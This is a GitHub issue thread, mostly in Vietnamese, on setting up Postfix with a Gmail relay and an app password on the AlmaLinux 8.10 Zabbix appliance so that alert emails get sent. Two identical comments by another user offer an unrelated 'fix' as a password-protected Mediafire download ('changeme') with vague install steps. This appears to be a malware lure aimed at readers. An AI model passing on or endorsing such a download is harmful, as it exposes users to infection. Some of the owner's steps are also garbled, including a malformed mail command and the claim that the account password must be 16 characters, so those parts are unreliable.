### ISSUE TITLE
HĐH Almalinux 8.10 dùng cho zabbix 6x/7x không dùng ssmtp thay bằng postfix?

### ISSUE THREAD

**Issue by PhDLeToanThang** [PhDLeToanThang/siem#3]
Use ssmtp instead of postfix to send emails:
we deploy Postfix in order to send results via email.

          if [ ! -z '${env.EMAIL}' ]; then
            sudo yum install -y /usr/sbin/postfix
            sudo systemctl start postfix
          fi

----
**Gmail:**
- Không thành công do ArchLinux 8.10 không cho cài ssmtp,
- Gmail phải bật chế độ Less Security trong khi Account email lại bật MFA/2FA là không khả thi.
- Lớp HĐH AlmaLinux 8.10 được đóng gói ở Zabbix 6.x/7.x Appliance đã giới hạn các lớp thư viện cài bổ sung (https://almalinux.org/blog/2024-05-28-announcing-810-stable/)
  ví dụ: ssmtp, msmtp, postfix thuộc nhóm MAPI API Client/ SMTP server mailrelay.

- Trường hợp gói Zabbix 6x/7x không cho cài ssmtp có thể ta thay thế bằng gói thư viện postfix như sau:
- Login Console OS AlmaLinux 8.10 bằng account login Root | Zabbix

![image](https://github.com/user-attachments/assets/76ffe18c-8c5a-49b2-a5e3-f65f5ef1a52a)

- Tiếp theo nhập lệnh:
  yum install -y /usr/sbin/postfix

```màn hiển thị kết quả:
Last metadata expiration check: 0:00:45 ago on Wed 03 Jun 2020 05:23:25 AM EDT.
Dependencies resolved.
================================================================================
 Package        Architecture  Version                Repository            Size
================================================================================
Installing:
 postfix        x86_64        2:3.3.1-12.el8         rhel_8_baseos        1.5 M
Installing dependencies:
 libicu         x86_64        60.3-2.el8_1           rhel_8_baseos        8.8 M

Transaction Summary
================================================================================
Install  2 Packages

Total download size: 10 M
Installed size: 36 M
Downloading Packages:
(1/2): postfix-3.3.1-12.el8.x86_64.rpm          2.1 MB/s | 1.5 MB     00:00    
(2/2): libicu-60.3-2.el8_1.x86_64.rpm           5.4 MB/s | 8.8 MB     00:01    
--------------------------------------------------------------------------------
Total                                           6.3 MB/s |  10 MB     00:01     
Running transaction check
Transaction check succeeded.
Running transaction test
Transaction test succeeded.
Running transaction
  Preparing        :                                                        1/1 
  Installing       : libicu-60.3-2.el8_1.x86_64                             1/2 
  Running scriptlet: libicu-60.3-2.el8_1.x86_64                             1/2 
  Running scriptlet: postfix-2:3.3.1-12.el8.x86_64                          2/2 
  Installing       : postfix-2:3.3.1-12.el8.x86_64                          2/2 
  Running scriptlet: postfix-2:3.3.1-12.el8.x86_64                          2/2 
  Verifying        : libicu-60.3-2.el8_1.x86_64                             1/2 
  Verifying        : postfix-2:3.3.1-12.el8.x86_64                          2/2 

Installed:
  postfix-2:3.3.1-12.el8.x86_64            libicu-60.3-2.el8_1.x86_64           

Complete!
```

  systemctl start postfix

  systemctl status postfix
  
  ![image](https://github.com/user-attachments/assets/d7b72adc-5407-46a2-8a57-b8eb1281cf66)

**Comment by PhDLeToanThang** [comment]
- Trường hợp gói Zabbix 6x/7x không cho cài ssmtp có thể ta thay thế bằng gói thư viện postfix như sau:
- Login Console OS AlmaLinux 8.10 bằng account login Root | Zabbix

![image](https://github.com/user-attachments/assets/76ffe18c-8c5a-49b2-a5e3-f65f5ef1a52a)

- Tiếp theo nhập lệnh:
  yum install -y /usr/sbin/postfix

```màn hiển thị kết quả:
Last metadata expiration check: 0:00:45 ago on Wed 03 Jun 2020 05:23:25 AM EDT.
Dependencies resolved.
================================================================================
 Package        Architecture  Version                Repository            Size
================================================================================
Installing:
 postfix        x86_64        2:3.3.1-12.el8         rhel_8_baseos        1.5 M
Installing dependencies:
 libicu         x86_64        60.3-2.el8_1           rhel_8_baseos        8.8 M

Transaction Summary
================================================================================
Install  2 Packages

Total download size: 10 M
Installed size: 36 M
Downloading Packages:
(1/2): postfix-3.3.1-12.el8.x86_64.rpm          2.1 MB/s | 1.5 MB     00:00    
(2/2): libicu-60.3-2.el8_1.x86_64.rpm           5.4 MB/s | 8.8 MB     00:01    
--------------------------------------------------------------------------------
Total                                           6.3 MB/s |  10 MB     00:01     
Running transaction check
Transaction check succeeded.
Running transaction test
Transaction test succeeded.
Running transaction
  Preparing        :                                                        1/1 
  Installing       : libicu-60.3-2.el8_1.x86_64                             1/2 
  Running scriptlet: libicu-60.3-2.el8_1.x86_64                             1/2 
  Running scriptlet: postfix-2:3.3.1-12.el8.x86_64                          2/2 
  Installing       : postfix-2:3.3.1-12.el8.x86_64                          2/2 
  Running scriptlet: postfix-2:3.3.1-12.el8.x86_64                          2/2 
  Verifying        : libicu-60.3-2.el8_1.x86_64                             1/2 
  Verifying        : postfix-2:3.3.1-12.el8.x86_64                          2/2 

Installed:
  postfix-2:3.3.1-12.el8.x86_64            libicu-60.3-2.el8_1.x86_64           

Complete!
```


  systemctl start postfix

  systemctl status postfix
  
  ![image](https://github.com/user-attachments/assets/d7b72adc-5407-46a2-8a57-b8eb1281cf66)

**Bước tiếp theo cấu hình postfix on AlmaLinux 8.10 của Zabbix 6x/7x:**

- Configure Postfix with Gmail:
- Cài thêm thư viện nano:  yum install nano
- Dùng nano sửa file cấu hình: nano /etc/postfix/main.cf
- Thêm vào cuối của file trên các dòng cấu hình sau:

relayhost = [smtp.gmail.com]:587
smtp_use_tls = yes
smtp_sasl_auth_enable = yes
smtp_sasl_password_maps = hash:/etc/postfix/sasl_passwd
smtp_sasl_security_options = noanonymous

![image](https://github.com/user-attachments/assets/a6bde825-3baa-41b0-8f85-c1dcd328b1de)

- Tiếp theo dùng lệnh nano tạo file: nano /etc/postfix/sasl_passwd

  Trong file sasl_passwrd có nội dung sau:

  Add the following line to the file, replacing "your-email@gmail.com" with your Gmail address and "your-password" with the App Password that you generated −

 [smtp.gmail.com]:587 your-email@gmail.com:your-password

 Sau khi save và Exit file sasl_passwd:

Now, use following command to hash the sasl_passwd file −

sudo postmap /etc/postfix/sasl_passwd

 systemctl enable postfix

yum install mailx

- Cuối cùng là kiểm thử gửi thư đi và màn xem thư:
(tham khảo: https://vitux.com/how-to-install-postfix-on-rocky-linux-8/ )
 - Lệnh:  echo "Test mail" | mail "test from AlmaLinux 8.10 of Postfix" thang@gmail.com 
 - Lệnh tiếp theo: mail

![image](https://github.com/user-attachments/assets/dd75caa0-c524-4893-ade0-9baa526ab363)

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by PhDLeToanThang** [comment]
# Cách cấu hình tài khoản thư Gmail gửi thông báo trong Zabbix

## Phần 1. Sơ đồ quy trình cấu hình Email Gmail/MSO365 trong Zabbix

![image](https://github.com/user-attachments/assets/e9ebb75d-ffda-464a-8422-2c0a4505d596)

Google không hề nói chính xác 2 bước sau cho chúng ta hoặc viết rõ những thay đổi bảo mật từ 2022 đến giờ: 
1.	Bạn phải bật xác thực 2 yếu tố và tạo mật khẩu ứng dụng cho gmail (mật khẩu dài 16 ký tự). 
2.	Thêm mật khẩu này vào cấu hình zabbix gmail và sẽ hoạt động trở lại với cảnh báo qua email.

## Khâu điều chỉnh lại phần bảo mật trên tài khoản Gmail:

![image](https://github.com/user-attachments/assets/fc7f6ea5-7bea-4542-ae24-d6304bad8770)

Truy cập mục Security Tab: https://myaccount.google.com/security?rapt= 

Lưu ý: 
-	Để có được tính năng APP Password thì chúng ta phải đổi mật khẩu thành dạng có độ dài 16 ký tự.
-	Phải bật cấu hình 2-Step verification qua thiết bị xác thực thứ 2 trở lên. 

Tham khảo phản hồi của support: https://support.google.com/mail/thread/267471964/app-password-not-listed-as-an-available-option?hl=en

![image](https://github.com/user-attachments/assets/4776e5dc-7a8e-40af-9e83-19b3e5ab3871)

### Bước 1. Đổi mật khẩu cho chính tài khoản gmail có độ dài 16 ký tự:

![image](https://github.com/user-attachments/assets/cae52678-efc7-42a9-8bd1-718cbf018c02)

-	Đã đổi thành công mật khẩu tài khoản gmail (mật khẩu dài 16 ký tự).

### Bước 2. Bật tính năng xác thực 2 yếu tố từ mục 2-Step Verification:

![image](https://github.com/user-attachments/assets/d41a948b-663b-4089-8c10-1d7ecfb72b67)

![image](https://github.com/user-attachments/assets/b2337615-fa74-49f1-ac4a-caea0c32da95)

![image](https://github.com/user-attachments/assets/c27435b9-6ad5-4e53-b626-c121f7fb5def)

-	Chúng ta đã bật xác thực 2 yếu tố “2FA” thành công.

### Bước 3. Sau khi Turn on 2-Step Verification và Change password dài 16 ký tự cần tạo App Password:

Truy cập vào trang https://myaccount.google.com/apppasswords
hoặc vẫn ở màn Security Tab nhập ký tự ỏ mục search: APP PASSWORD 

![image](https://github.com/user-attachments/assets/2c6314e9-ce38-4858-a311-ae0a5c299cb0)

-	Cửa sổ mới hiện ra khi click vào App passwords

![image](https://github.com/user-attachments/assets/e60adc25-3185-4c40-a7d6-341e5e0baf97)

-	Đặt tên cho App name: ví dụ:  Zabbix

![image](https://github.com/user-attachments/assets/6d3858e8-3896-4631-8df4-bdcf78021014)

![image](https://github.com/user-attachments/assets/7488566e-e9c4-4e40-b9f0-f6f9df197b59)

**Lưu ý: mật khẩu này chỉ có giá trị với 16 ký tự (cần xoá những ký tự trống ở giữa 4 cụm ký tự đó trước khi dùng).**

## Phần 2. Quay lại mục Media Type cấu hình Admin trong Zabbix 6.x/7x

-	Ở Navigator menu: Alerts >Media types > Chọn mẫu Email để lưu mới cấu hình gửi email. 
-	Nội dung khai báo như sau:

- [ ] 	Name: Email
- [ ] 	Type: Email
- [ ] 	SMTP server: smtp.gmail.com
- [ ] 	SMTP server port: 587
- [ ] 	SMTP helo: smtp.gmail.com
- [ ] 	SMTP email: <địa chỉ gmail của bạn>@gmail.com
- [ ] 	Connection security:STARTTLS
- [ ] 	Authentication: Username and password
- [ ] 	Username: <địa chỉ gmail của bạn>@gmail.com
- [ ] 	Password:  <Mật khẩu nhập từ 16 ký tự đã được khởi tạo ở mục App Name your password>
- [ ] 	Message format: HTML/Plain text
- [ ] 	Description: Test ABC


**Bước 1. Điền cấu hình tài khoản Gmail:**

![image](https://github.com/user-attachments/assets/d06b3a05-78f1-429c-b3f1-d93ecb0fc09d)

**Bước 2. Điền thông tin Username:**
 là địa chỉ email, nhưng password là Mật khẩu có trong mục App Name for your password bạn đã khởi tạo trong Security Tab.

![image](https://github.com/user-attachments/assets/28906740-ea37-4182-b299-9675f3142246)

**Lưu ý:**
-	Mật khẩu nhập ở ô Password là độ dài 16 ký tự (không có khoảng trắng). 
-	Mật khẩu này do mục Security Tab > APP Password tự động tạo, nên không bao giờ giống với mật khẩu hòm thư gmail do bạn đã tạo ra.
-	Mật khẩu App Name for your password là khác với mật khẩu tài khoản hòm thư Gmail.
